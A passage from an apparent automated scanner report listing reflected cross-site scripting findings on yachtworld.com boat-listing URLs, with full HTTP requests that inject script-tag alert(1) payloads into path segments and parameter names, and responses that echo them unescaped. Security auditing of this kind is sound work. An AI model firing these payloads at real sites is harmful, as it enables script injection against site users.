5261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:41 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
ref="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States&boat_id=2255088">
...[SNIP]...

3.111. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d3f"><script>alert(1)</script>4f5ae1f7ad8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:17 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:16 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
ting/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8&boat_id=2255088">
...[SNIP]...

3.112. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 588f2"><script>alert(1)</script>9c458a9cc4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States?588f2"><script>alert(1)</script>9c458a9cc4e=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&588f2"><script>alert(1)</script>9c458a9cc4e=1&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States&boat_id=2255088">
...[SNIP]...

3.113. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac7d"><script>alert(1)</script>cc630271c5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

